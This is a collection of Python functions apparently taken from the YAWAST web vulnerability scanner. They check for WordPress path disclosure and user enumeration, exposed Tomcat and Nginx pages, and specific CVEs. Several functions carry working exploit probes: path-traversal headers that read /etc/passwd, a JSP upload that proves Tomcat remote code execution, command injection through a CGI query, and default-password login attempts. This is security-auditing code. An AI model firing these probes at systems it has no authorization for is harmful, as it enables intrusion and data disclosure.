예제 #1
0
def check_path_disclosure(wp_url: str) -> List[Result]:
    # this is a list of files that are known to throw a fatal error when accessed directly
    # this is from a manual review of all plugins with at least 1M installs
    urls = [
        "wp-content/plugins/hello.php",
        "wp-content/plugins/akismet/akismet.php",
        "wp-content/plugins/contact-form-7/includes/capabilities.php",
        "wp-content/plugins/wordpress-seo/admin/views/partial-alerts-errors.php",
        "wp-content/plugins/jetpack/load-jetpack.php",
        "wp-content/plugins/jetpack/uninstall.php",
        "wp-content/plugins/duplicate-post/duplicate-post-admin.php",
        "wp-content/plugins/wpforms-lite/includes/admin/class-welcome.php",
        "wp-content/plugins/wp-google-maps/base/includes/welcome.php",
        "wp-content/plugins/wp-super-cache/wp-cache.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/wpforms/bootstrap.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/bootstrap.php",
        "wp-content/plugins/regenerate-thumbnails/regenerate-thumbnails.php",
        "wp-content/plugins/advanced-custom-fields/includes/deprecated.php",
        "wp-content/plugins/redirection/redirection.php",
        "wp-content/plugins/wpforms-lite/includes/admin/importers/class-ninja-forms.php",
        "wp-content/plugins/ninja-forms/includes/deprecated.php",
        "wp-content/plugins/so-widgets-bundle/so-widgets-bundle.php",
        "wp-content/plugins/wp-fastest-cache/templates/preload.php",
        "wp-content/plugins/duplicate-page/duplicatepage.php",
        "wp-content/plugins/better-wp-security/better-wp-security.php",
        "wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php",
        "wp-content/plugins/related-posts/views/settings.php",
        "wp-content/plugins/wpcontentguard/views/settings.php",
        "wp-content/plugins/simple-social-icons/simple-social-icons.php",
    ]
    results: List[Result] = []

    for url in urls:
        target = urljoin(wp_url, url)

        head = network.http_head(target, False)
        if head.status_code != 404:
            resp = network.http_get(target, False)
            if resp.status_code < 300 or resp.status_code >= 500:
                # we have some kind of response that could be useful
                if "<b>Fatal error</b>:" in resp.text:
                    # we have an error
                    pattern = r"<b>((\/|[A-Z]:\\).*.php)<\/b>"
                    if re.search(pattern, resp.text):
                        try:
                            path = re.findall(pattern, resp.text)[0][0]
                            results.append(
                                Result.from_evidence(
                                    Evidence.from_response(
                                        resp, {"path": path}),
                                    f"WordPress File Path Disclosure: {target} ({path})",
                                    Vulnerabilities.
                                    APP_WORDPRESS_PATH_DISCLOSURE,
                                ))
                        except Exception:
                            output.debug_exception()

            results += response_scanner.check_response(target, resp)

    return results
예제 #2
0
def check_cve_2019_5418(url: str) -> List[Result]:
    global _checked

    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/") or url in _checked:
        return []

    results: List[Result] = []
    _checked.append(url)

    try:
        res = network.http_get(
            url, False, {"Accept": "../../../../../../../../../e*c/p*sswd{{"}
        )
        body = res.text
        req = network.http_build_raw_request(res.request)

        results += response_scanner.check_response(url, res)

        pattern = r"root:[a-zA-Z0-9]+:0:0:.+$"
        mtch = re.search(pattern, body)

        if mtch:
            results.append(
                Result(
                    f"Rails CVE-2019-5418: File Content Disclosure: {url} - {mtch.group(0)}",
                    Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                    url,
                    [body, req],
                )
            )
    except Exception:
        output.debug_exception()

    return results
예제 #3
0
def check_cve_2019_0232(links: List[str]) -> List[Result]:
    results: List[Result] = []
    targets: List[str] = []

    for link in links:
        if "cgi-bin" in link:
            if "?" in link:
                targets.append(f"{link}&dir")
            else:
                targets.append(f"{link}?dir")

    for target in targets:
        res = network.http_get(target, False)
        body = res.text

        if "<DIR>" in body:
            # we have a hit
            results.append(
                Result(
                    f"Apache Tomcat RCE (CVE-2019-0232): {target}",
                    Vulnerabilities.SERVER_TOMCAT_CVE_2019_0232,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                ))

        results += response_scanner.check_response(target, res)

    return results
예제 #4
0
def check_json_user_enum(url: str) -> List[Result]:
    results = []
    target = urljoin(url, "wp-json/wp/v2/users")

    res = network.http_get(target, False)
    body = res.text

    if res.status_code < 300 and "slug" in body:
        data = res.json()

        # log the enum finding
        results.append(
            Result.from_evidence(
                Evidence.from_response(res),
                f"WordPress WP-JSON User Enumeration at {target}",
                Vulnerabilities.APP_WORDPRESS_USER_ENUM_API,
            ))

        # log the individual users
        for user in data:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(
                        res,
                        {
                            "user_id": user["id"],
                            "user_slug": user["slug"],
                            "user_name": user["name"],
                        },
                    ),
                    f"ID: {user['id']}\tUser Slug: '{user['slug']}'\t\tUser Name: '{user['name']}'",
                    Vulnerabilities.APP_WORDPRESS_USER_FOUND,
                ))

    return results
예제 #5
0
파일: file_search.py 프로젝트: sgnls/yawast
def _check_url(urls: List[str], queue, follow_redirections, recursive) -> None:
    files: List[str] = []
    results: List[Result] = []

    for url in urls:
        try:
            # get the HEAD first, we only really care about actual files
            res = network.http_head(url, False)

            if res.status_code < 300:
                # run a scan on the full result, so we can ensure that we get any issues
                results += response_scanner.check_response(
                    url, network.http_get(url, False))

                files.append(url)

                if recursive:
                    fl, re = find_directories(url, follow_redirections,
                                              recursive)

                    files.extend(fl)
                    results.extend(re)
            elif res.status_code < 400 and follow_redirections:
                if "Location" in res.headers:
                    _check_url([res.headers["Location"]], queue,
                               follow_redirections, recursive)
        except Exception as error:
            output.debug(f"Error checking URL ({url}): {str(error)}")

    queue.put((files, results))
예제 #6
0
def check_aspnet_handlers(url: str) -> List[Result]:
    results = []

    file_name = secrets.token_hex(12)

    exts = ["ashx", "aspx", "asmx", "soap", "rem"]

    for ext in exts:
        target = urljoin(url, f"{file_name}.{ext}")
        vuln = False

        res = network.http_get(target, False)
        body = res.text

        if "Location" in res.headers and "aspxerrorpath" in res.headers["Location"]:
            vuln = True
        elif (
            res.status_code >= 400
            and "Remoting.RemotingException" in body
            or "HttpException" in body
            or "FileNotFoundException" in body
        ):
            vuln = True

        if vuln:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res, {"handler": ext}),
                    f"ASP.NET Handler Enumeration: {ext}",
                    Vulnerabilities.SERVER_ASPNET_HANDLER_ENUM,
                )
            )

    return results
예제 #7
0
파일: nginx.py 프로젝트: rurbin3/yawast
def check_status(url: str) -> List[Result]:
    results: List[Result] = []
    search = ["status/", "stats/"]

    for path in search:
        target = urljoin(url, path)

        res = network.http_get(target, False)
        body = res.text

        if res.status_code == 200 and "Active connections:" in body:
            results.append(
                Result(
                    f"Nginx status page found: {target}",
                    Vulnerabilities.SERVER_NGINX_STATUS_EXPOSED,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                ))

        results += response_scanner.check_response(target, res)

    return results
예제 #8
0
파일: php.py 프로젝트: rurbin3/yawast
    def _get_resp(url: str, q_count: int) -> Response:
        path_info = "/PHP\nindex.php"
        u = urlparse(url)
        orig_path = quote(u.path)
        new_path = quote(u.path + path_info)
        delta = len(new_path) - len(path_info) - len(orig_path)
        prime = q_count - delta / 2
        req_url = urljoin(url, new_path + "?" + "Q" * int(prime))

        return network.http_get(req_url, False)
예제 #9
0
    def test_response_scanner(self):
        network.init("", "", "")
        url = "https://adamcaudill.com/"
        resp = network.http_get(url)

        http.reset()
        res = response_scanner.check_response(url, resp)

        self.assertTrue(any("External JavaScript File" in r.message for r in res))
        self.assertTrue(any("Vulnerable JavaScript" in r.message for r in res))
예제 #10
0
def _identify_by_path(url: str, path: str) -> Tuple[Response, Union[str, None]]:
    target = urljoin(url, f"{path}wp-login.php")

    res = network.http_get(target, False)
    body = res.text

    if res.status_code == 200 and "Powered by WordPress" in body:
        return res, urljoin(url, path)
    else:
        return res, None
예제 #11
0
파일: jira.py 프로젝트: sgnls/yawast
def check_for_jira(session: Session) -> Tuple[List[Result], Union[str, None]]:
    # this checks for an instance of Jira relative to the session URL
    results: List[Result] = []
    jira_url = None

    try:
        targets = [
            f"{session.url}secure/Dashboard.jspa",
            f"{session.url}jira/secure/Dashboard.jspa",
        ]

        for target in targets:
            res = network.http_get(target, False)

            if (
                res.status_code == 200
                and 'name="application-name" content="JIRA"' in res.text
            ):
                # we have a Jira instance
                jira_url = target

                # try to get the version
                ver_str = "unknown"
                try:
                    ver_pattern = (
                        r"<meta name=\"ajs-version-number\" content=\"([\d\.]+)\">"
                    )
                    version = re.search(ver_pattern, res.text).group(1)

                    build_pattern = (
                        r"<meta name=\"ajs-build-number\" content=\"(\d+)\">"
                    )
                    build = re.search(build_pattern, res.text).group(1)

                    ver_str = f"v{version}-{build}"
                except:
                    output.debug_exception()

                results.append(
                    Result.from_evidence(
                        Evidence.from_response(res),
                        f"Jira Installation Found ({ver_str}): {target}",
                        Vulnerabilities.APP_JIRA_FOUND,
                    )
                )

            results += response_scanner.check_response(target, res)

            break
    except Exception:
        output.debug_exception()

    return results, jira_url
예제 #12
0
def scan_endpoint(uri, definitions):
    """
    Given a uri it scans for vulnerability in uri and the content
    hosted at that uri
    """
    uri_scan_result = scan_uri(uri, definitions)

    filecontent = network.http_get(uri, False).text
    filecontent_scan_result = scan_file_content(filecontent, definitions)

    uri_scan_result.extend(filecontent_scan_result)
    return uri_scan_result
예제 #13
0
def _get_data() -> None:
    global _data
    data_url = "https://raw.githubusercontent.com/augustd/burp-suite-error-message-checks/master/src/main/resources/burp/match-rules.tab"

    try:
        raw = network.http_get(data_url).text

        for line in raw.splitlines():
            _data.append(_MatchRule(line))

    except Exception as error:
        output.debug(f"Failed to get version data: {error}")
        output.debug_exception()
예제 #14
0
def _check_version_404(url: str) -> List[Result]:
    results: List[Result] = []

    rnd = secrets.token_hex(12)

    target = urljoin(url, f"{rnd}.jsp")

    res = network.http_get(target, False)

    if res.status_code > 400:
        results += get_version(target, res, "404 Error Message")

    return results
예제 #15
0
    def test_net_init_invalid_header(self):
        try:
            output.setup(False, True, True)
            with utils.capture_sys_output() as (stdout, stderr):
                network.init("", "", "AUTH123")

                _ = network.http_get("http://example.com")
        except Exception as error:
            self.assertIsNone(error)

        self.assertIsNotNone(network._requester)
        self.assertNotIn("Exception", stderr.getvalue())
        self.assertIn("Error", stdout.getvalue())
        self.assertIn("header must be in NAME=VALUE format", stdout.getvalue())

        network.reset()
예제 #16
0
    def test_net_init_invalid_proxy_ftp(self):
        try:
            output.setup(False, True, True)
            with utils.capture_sys_output() as (stdout, stderr):
                network.init("ftp://127.0.0.1:1234", "", "")

                _ = network.http_get("http://example.com")
        except Exception as error:
            self.assertIsNone(error)

        self.assertIsNotNone(network._requester)
        self.assertNotIn("Exception", stderr.getvalue())
        self.assertIn("Error", stdout.getvalue())
        self.assertIn("Invalid proxy server specified", stdout.getvalue())

        network.reset()
예제 #17
0
def _get_data() -> None:
    global _data

    data: Union[Dict[Any, Any], None] = None
    data_url = "https://raw.githubusercontent.com/RetireJS/retire.js/master/repository/jsrepository.json"

    try:
        raw = network.http_get(data_url).content
        raw_js = raw.decode("utf-8").replace("§§version§§", "[0-9][0-9.a-z_\\\\-]+")

        data = json.loads(raw_js)

    except Exception as error:
        output.debug(f"Failed to get version data: {error}")
        output.debug_exception()

    _data = data
예제 #18
0
def check_cve_2017_12615(url: str) -> List[Result]:
    results = []

    try:
        file_name = secrets.token_hex(12)
        check_value = secrets.token_hex(12)

        target = urljoin(url, f"{file_name}.jsp/")
        res_put = network.http_put(target, f"<% out.println({check_value});%>",
                                   False)

        if res_put.status_code < 300:
            # code should be 2xx for this to work
            # now we need to check to see if it worked
            created_file = urljoin(url, f"{file_name}.jsp")

            res_get = network.http_get(created_file, False)

            if check_value in res_get.text:
                # we have RCE
                results.append(
                    Result(
                        f"Apache Tomcat PUT RCE (CVE-2017-12615): {created_file}",
                        Vulnerabilities.SERVER_TOMCAT_CVE_2017_12615,
                        url,
                        [
                            network.http_build_raw_request(res_put.request),
                            network.http_build_raw_response(res_put),
                            network.http_build_raw_request(res_get.request),
                            network.http_build_raw_response(res_get),
                        ],
                    ))
            else:
                results += response_scanner.check_response(
                    created_file, res_get)
        else:
            # if we didn't get a hit, go ahead and scan it to see if there's
            #  anything else that we should be picking up.
            results += response_scanner.check_response(target, res_put)
    except Exception:
        output.debug_exception()

    return results
예제 #19
0
def check_struts_sample(url: str) -> List[Result]:
    results: List[Result] = []

    try:
        # make sure we have real 404s
        file_good, _, _, _ = network.check_404_response(url)
        if not file_good:
            return results

        search = [
            "Struts2XMLHelloWorld/User/home.action",
            "struts2-showcase/showcase.action",
            "struts2-showcase/titles/index.action",
            "struts2-bootstrap-showcase/",
            "struts2-showcase/index.action",
            "struts2-bootstrap-showcase/index.action",
            "struts2-rest-showcase/",
        ]

        for path in search:
            target = urljoin(url, path)

            res = network.http_get(target, False)

            # check for other issues
            results += response_scanner.check_response(target, res)

            if res.status_code == 200:
                results.append(
                    Result(
                        f"Struts Sample Found: {target}",
                        Vulnerabilities.SERVER_TOMCAT_STRUTS_SAMPLE,
                        target,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
    except Exception:
        output.debug_exception()

    return results
예제 #20
0
def check_manager_password(url: str) -> List[Result]:
    results = []

    try:
        creds = [
            b"tomcat:tomcat",
            b"tomcat:password",
            b"tomcat:",
            b"admin:admin",
            b"admin:password",
            b"admin:",
        ]

        for cred in creds:
            ce = base64.b64encode(cred)

            res = network.http_get(url, False, {"Authorization": ce})
            body = res.text

            if (
                '<font size="+2">Tomcat Web Application Manager</font>' in body
                or '<font size="+2">Tomcat Virtual Host Manager</font>' in body
            ):
                # we got in
                results.append(
                    Result(
                        f"Apache Tomcat Weak Manager Password: '******' - {url}",
                        Vulnerabilities.SERVER_TOMCAT_MANAGER_WEAK_PASSWORD,
                        url,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
            else:
                # if we didn't get a hit, go ahead and scan it to see if there's
                #  anything else that we should be picking up.
                results += response_scanner.check_response(url, res)
    except Exception:
        output.debug_exception()

    return results
예제 #21
0
def check_telerik_rau_enabled(soup: BeautifulSoup, url: str) -> List[Result]:
    results: List[Result] = []

    parsed = urlparse(url)
    domain = utils.get_domain(parsed.netloc)

    try:
        # get all the scripts
        files = [i.get("src") for i in soup.find_all("script") if i.get("src")]

        for file in files:
            if "Telerik.Web.UI.WebResource.axd" in file:
                # ok, they are using Telerik UI for ASP.NET AJAX
                # fix-up the URL
                if str(file).startswith("//"):
                    file = f"https:{file}"
                if str(file).startswith("/") or (not str(file).startswith("http")):
                    if parsed.scheme == "https":
                        file = urljoin(f"https://{domain}", file)
                    else:
                        file = urljoin(f"http://{domain}", file)

                target = urlparse(file)
                target = target._replace(query="type=rau")

                if domain in target:
                    res = network.http_get(urlunparse(target), False)
                    # NOTE: Typo in "succesfully" is intentional - do not fix
                    if "RadAsyncUpload handler is registered succesfully" in res.text:
                        results.append(
                            Result.from_evidence(
                                Evidence.from_response(res, {"original_url": url}),
                                f"Telerik UI for ASP.NET AJAX RadAsyncUpload Enabled "
                                f"(Check for CVE-2019-18935) at {target}",
                                Vulnerabilities.APP_TELERIK_UI_RAD_ASYNC_UPLOAD_ENABLED,
                            )
                        )

                        break
    except Exception:
        output.debug_exception()

    return results
예제 #22
0
def check_server_status(url: str) -> List[Result]:
    results = []

    target = urljoin(url, "server-status/")

    res = network.http_get(target, False)
    body = res.text

    if "Apache Server Status" in body:
        results.append(
            Result(
                f"Apache HTTPD Server Status found: {target}",
                Vulnerabilities.SERVER_APACHE_STATUS,
                url,
                body,
            ))

    results += response_scanner.check_response(url, res)

    return results
예제 #23
0
def check_jira_user_registration(jira_url: str) -> List[Result]:
    results: List[Result] = []

    try:
        target = f"{jira_url.rsplit('/', 1)[0]}/Signup!default.jspa"
        res = network.http_get(target, False)

        if res.status_code == 200 and "<title>Sign up for Jira" in res.text:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"Jira User Registration Enabled: {target}",
                    Vulnerabilities.APP_JIRA_USER_REG_ENABLED,
                ))

        results += response_scanner.check_response(target, res)
    except Exception:
        output.debug_exception()

    return results
예제 #24
0
def _check_url(url: str, targets: List[str]) -> Tuple[List[str], List[Result]]:
    files: List[str] = []
    results: List[Result] = []

    for target in targets:
        target_url = urljoin(url, target)

        res = network.http_get(target_url, False)

        results += response_scanner.check_response(target_url, res)

        if res.status_code < 300:
            files.append(target_url)
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"File found: {target_url}",
                    Vulnerabilities.SERVER_SPECIAL_FILE_EXPOSED,
                ))

    return files, results
예제 #25
0
def check_manager(url: str) -> List[Result]:
    results = []

    try:
        for p in [urljoin(url, "manager/"), urljoin(url, "host-manager/")]:
            # check for both Tomcat 6, and 7+
            for path in [urljoin(p, "html/"), p]:

                res = network.http_get(path, False)

                body = res.text

                if "<tt>conf/tomcat-users.xml</tt>" in body:
                    # we have a finding
                    vuln = Vulnerabilities.SERVER_TOMCAT_MANAGER_EXPOSED
                    if "host-manager" in path:
                        vuln = Vulnerabilities.SERVER_TOMCAT_HOST_MANAGER_EXPOSED

                    results.append(
                        Result(
                            f"Apache Tomcat Manager found: {path}",
                            vuln,
                            path,
                            [
                                network.http_build_raw_request(res.request),
                                network.http_build_raw_response(res),
                            ],
                        )
                    )

                    # check to see if we can get in with a default password
                    results += check_manager_password(url)
                else:
                    # if we didn't get a hit, go ahead and scan it to see if there's
                    #  anything else that we should be picking up.
                    results += response_scanner.check_response(path, res)
    except Exception:
        output.debug_exception()

    return results
예제 #26
0
파일: rails.py 프로젝트: sasqwatch/yawast
def check_cve_2019_5418(url: str) -> List[Result]:
    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/"):
        return []

    results: List[Result] = []

    res = network.http_get(
        url, False, {"Accept": "../../../../../../../../../etc/passwd{{"})
    body = res.text
    req = network.http_build_raw_request(res.request)

    results += response_scanner.check_response(url, res)

    if "root:" in body:
        results.append(
            Result(
                f"Rails CVE-2019-5418: File Content Disclosure: {url}",
                Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                url,
                [body, req],
            ))

    return results
예제 #27
0
파일: file_search.py 프로젝트: sgnls/yawast
 def _get_resp(url: str) -> Response:
     return network.http_get(url, False)
예제 #28
0
def _get_links(base_url: str, urls: List[str], queue, pool):
    global _links, _insecure, _tasks, _lock

    max_length = 1024 * 1024 * 3  # 3MB

    results: List[Result] = []

    # fail-safe to make sure we don't go too crazy
    if len(_links) > 10000:
        # if we have more than 10,000 URLs in our list, just stop
        output.debug(
            "Spider: Link list contains > 10,000 items. Stopped gathering more links."
        )

        return

    for url in urls:
        try:
            # list of pages found that will need to be processed
            to_process: List[str] = []

            res = network.http_get(url, False)

            # get the length, so that we don't parse huge documents
            if "Content-Length" in res.headers:
                length = int(res.headers["Content-Length"])
            else:
                length = len(res.content)

            if http_utils.is_text(res) and length < max_length:
                soup = BeautifulSoup(res.text, "html.parser")
            else:
                # no clue what this is
                soup = None

            results += response_scanner.check_response(url, res, soup)

            if soup is not None:
                for link in soup.find_all("a"):
                    href = link.get("href")

                    if str(href).startswith(
                            "/") and not str(href).startswith("//"):
                        href = urljoin(base_url, href)

                    if href is not None:
                        # check to see if this link is in scope
                        if base_url in href and href not in _links:
                            if "." in href.split("/")[-1]:
                                file_ext = href.split("/")[-1].split(".")[-1]
                            else:
                                file_ext = None

                            with _lock:
                                _links.append(href)

                            # filter out some of the obvious binary files
                            if file_ext is None or file_ext not in [
                                    "gzip",
                                    "jpg",
                                    "jpeg",
                                    "gif",
                                    "woff",
                                    "zip",
                                    "exe",
                                    "gz",
                                    "pdf",
                            ]:
                                if not _is_unsafe_link(href, link.string):
                                    to_process.append(href)
                                else:
                                    output.debug(
                                        f"Skipping unsafe URL: {link.string} - {href}"
                                    )
                            else:
                                output.debug(
                                    f'Skipping URL "{href}" due to file extension "{file_ext}"'
                                )
                        else:
                            if (base_url.startswith("https://")
                                    and str(href).startswith("http://")
                                    and str(href) not in _insecure):
                                # link from secure to insecure
                                with _lock:
                                    _insecure.append(str(href))

                                results.append(
                                    Result.from_evidence(
                                        Evidence.from_response(
                                            res, {"link": href}),
                                        f"Insecure Link: {url} links to {href}",
                                        Vulnerabilities.HTTP_INSECURE_LINK,
                                    ))

            # handle redirects
            if "Location" in res.headers:
                redirect = res.headers["Location"]

                # check for relative link
                if str(redirect).startswith("/"):
                    redirect = urljoin(base_url, redirect)

                # make sure that we aren't redirected out of scope
                if base_url in redirect:
                    to_process.append(redirect)

            if len(to_process) > 0:
                asy = pool.apply_async(_get_links,
                                       (base_url, to_process, queue, pool))

                with _lock:
                    _tasks.append(asy)
        except Exception:
            output.debug_exception()

    output.debug(f"GetLinks Task Completed - {len(results)} issues found.")
    queue.put(results)